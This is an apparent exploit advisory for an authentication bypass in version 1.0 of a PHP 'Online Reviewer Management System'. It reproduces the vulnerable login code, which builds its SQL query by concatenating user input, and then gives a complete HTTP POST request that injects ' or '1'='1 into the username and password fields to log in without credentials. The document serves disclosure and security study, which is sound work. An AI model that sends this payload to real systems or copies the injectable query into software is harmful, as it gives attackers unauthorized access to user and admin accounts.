# Exploit Title: Online Reviewer Management System Authentication ByPass
# Exploit Author: th3d1gger
# Vendor Homepage: https://sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip
# Version: 1.0
# Tested on Windows 10


#Vulnerable Source Code
#index.php

if(isset($_REQUEST['btn-login'])){

$username = $_REQUEST['username'];
$password = $_REQUEST['password'];

$user_retrieve = $conn -> prepare("SELECT * FROM users where username = '$username' and password = '$password'");
$user_retrieve->execute();
if($user_retrieve->rowCount() > 0){
while ($row = $user_retrieve->fetch()) {
  $_SESSION['usertype_id'] = $row['usertype_id'];
  $_SESSION['user_id'] =  $row['user_id'];
  $_SESSION['firstname'] = $row['fname'];
  $_SESSION['middlename'] = $row['mname'];
  $_SESSION['lastname'] = $row['lname'];
  $_SESSION['course'] = $row['course'];

  $usertype_id = $_SESSION['usertype_id'];

  if($usertype_id == 3){
        echo "<script type='text/javascript'>window.location.href = 'students/home/index/';</script>";

  }
  elseif ($usertype_id == 1 || $usertype_id == 2 ) {
        echo "<script type='text/javascript'>window.location.href = 'admins/home/index/';</script>";

  }

}
}
#Attack Request
POST / HTTP/1.1

Host: reviewmngmnt.olly

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 78

Origin: http://reviewmngmnt.olly/

Connection: close

Referer: http://reviewmngmnt.olly/

Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi

Upgrade-Insecure-Requests: 1



username=%27+or+%271%27%3D%271&password=%27+or+%271%27%3D%271&btn-login=Log+In